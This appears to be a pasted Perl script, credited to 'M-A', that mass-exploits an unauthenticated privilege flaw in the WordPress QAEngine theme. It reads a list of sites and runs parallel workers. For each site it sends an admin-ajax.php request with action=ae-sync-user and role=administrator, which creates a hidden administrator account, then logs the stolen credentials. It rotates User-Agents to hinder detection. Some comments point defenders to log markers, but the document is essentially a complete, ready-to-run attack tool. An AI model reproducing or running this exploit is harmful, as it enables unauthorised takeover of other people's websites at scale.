Jemb0t_IR3eng

QAEngine Theme RCE + Fork

Apr 17th, 2019
  1. #!/usr/bin/perl
  2. # Requires the Parallel::ForkManager module: sudo apt-get install libparallel-forkmanager-perl
  3. # or: cpan Parallel::ForkManager
  4. # @version 1.0
  5. # @author M-A
  6. # @link https://raw.githubusercontent.com/mranarshit/wp-Up_exp/master/qaengine.pl
  7. # Perl Lov3r :)
  8. use LWP::UserAgent;
  9. use Getopt::Long;
  10. use Parallel::ForkManager;
  11.  
  12.  
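  # Human-readable start time; printed once in the "[+] Started" banner.
  my $datestring = localtime();

  # Run-time options filled in by GetOptions: $list is the input file of
  # sites, $log the results file written through save(), and $thread the
  # number of parallel workers.  $log is declared here because the rest of
  # the script reads and writes it; the former $wordlist slot and the
  # broken-down localtime() fields were never read anywhere in the script.
  our ($list, $log, $thread);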
  # randomagent()
  #
  # Returns one browser User-Agent string chosen at random from a fixed list
  # of six.  Because the value changes from request to request, the
  # User-Agent header on its own is a poor basis for spotting this script in
  # web server logs.
  sub randomagent {
      my @agents = (
          'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
          'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
          'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
          'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
          'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
          'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31',
      );

      # rand() yields a fraction below the element count; int() truncates it
      # to a valid index.
      my $pick = int( rand( scalar @agents ) );
      return $agents[$pick];
  }
  27.  
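  # Parse the command line.  All three options are mandatory, so a parse
  # failure and a missing value are handled the same way: print the usage
  # text and stop.  Previously flag() only printed and the script carried on
  # with undefined settings until the later open() failed.
  my $options_ok = GetOptions(
      'url|u=s'      => \$list,      # file with one site per line
      'wordlist|w=s' => \$log,       # despite the option name, this is the results log
      'threads|t=i'  => \$thread,    # maximum number of parallel workers
  );

  if ( !$options_ok || !defined($list) || !defined($log) || !defined($thread) ) {
      flag();
      exit 1;
  }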
  37.  
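  print "[+] Started : $datestring\n";

  # Load the site list.  The three-argument form of open keeps characters in
  # the file name from being interpreted as an open mode or a pipe.
  open( my $arq, '<', $list ) or die "Cannot open $list: $!\n";
  my @site = grep { !/^$/ } <$arq>;    # drop empty lines
  close($arq);
  print "[" . scalar(@site) . "] URL to test upload\n\n";

  # One forked worker per entry, with at most $thread running at a time.
  my $pm = Parallel::ForkManager->new($thread);
  foreach my $web (@site) {
      # start() returns the child's PID in the parent, which moves on to the
      # next entry, and 0 in the child, which continues below.
      $pm->start and next;
      chomp($web);

      # Entries without a scheme are treated as plain-HTTP sites.
      if ( $web !~ /^(http|https):\/\// ) {
          $web = 'http://' . $web;
      }

      # Every site gets its own randomly generated login and password.
      my $user = Generate_user();
      my $pass = Generate_user();
      expadd( $web, $user, $pass );
      $pm->finish;
  }
  $pm->wait_all_children();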
  59.  
  # expadd($url, $user, $pass)
  #
  # Sends one GET request, carrying no login or cookie, to the site's
  # admin-ajax.php endpoint with action=ae-sync-user, method=create and
  # role=administrator, then reports whether the response body contains
  # "success":true.  A match is printed and appended, through save(), to the
  # log file named by $log.
  #
  # For defenders: the same markers identify this activity in web access
  # logs -- a request to /wp-admin/admin-ajax.php whose query string carries
  # action=ae-sync-user together with role=administrator.  The User-Agent is
  # picked at random per request, so it is not a reliable filter.
  sub expadd {
      my ( $url, $user, $pass ) = @_;

      # Hostname verification is switched off, so certificate names on
      # HTTPS sites are not checked.
      my $ua = LWP::UserAgent->new( ssl_opts => { verify_hostname => 0 } );
      $ua->timeout(10);    # seconds
      $ua->agent( randomagent() );

      my $path = join '',
          "/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=",
          $user, "&user_pass=", $pass, "&role=administrator";
      my $response = $ua->get( $url . $path );

      # Both outcomes begin with the same site line.
      print "\n[*] $url \n";
      if ( $response->content =~ /success\":true/ ) {
          print "[OK] New Admin Successfuly Created \n";
          print "| User : $user \n";
          print "| Pass : $pass \n";
          save( $log, "$url : ($user:$pass)" );
      }
      else {
          print "[+] Error Creating New User \n";
      }
  }
  # flag()
  #
  # Prints the banner and the usage summary for the three command-line
  # options to standard output.  It only prints; it does not end the program.
  sub flag {
      print
          "\n[+] WP QAEngine Theme R3m0t3 C0d3 Ex3cut10n (Add WP Admin) Exploiter \n[*] Coder => M-A\n",
          "[+] Usage :\n",
          "\t-u | urllist (List of websites)\n",
          "\t-w | logfile (Log file to save ressults)\n",
          "\t-t | threads (Number of Thread)\n\n";
  }
  # rndstr($length, @alphabet)
  #
  # Builds a string of $length characters, each picked at random (with
  # repetition) from @alphabet.
  sub rndstr {
      my ( $length, @alphabet ) = @_;
      my @picked = map { $alphabet[ rand @alphabet ] } 1 .. $length;
      return join '', @picked;
  }

  # Generate_user()
  #
  # Returns a six-character string drawn from the digits 1-9 and the
  # lowercase letters a-z.  The script uses it for both the login and the
  # password of each account it requests, so an unexpected administrator
  # account with a name of that shape is worth checking when auditing a site.
  sub Generate_user {
      return rndstr( 6, 1 .. 9, 'a' .. 'z' );
  }
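  # save($file, $item)
  #
  # Appends $item plus a newline to $file.  Returns the result of close() on
  # success and 0 when the file cannot be opened.
  #
  # The three-argument open with a lexical handle replaces the earlier
  # ">>".$file form, in which the file name was parsed together with the
  # mode, and the open is now checked: a failure produces a warning instead
  # of a silent print to an unopened handle.  It stays non-fatal so one bad
  # log write does not stop the caller.
  sub save {
      my ( $file, $item ) = @_;

      open( my $out, '>>', $file ) or do {
          warn "save: cannot append to $file: $!\n";
          return 0;
      };
      print {$out} $item . "\n";
      return close($out);
  }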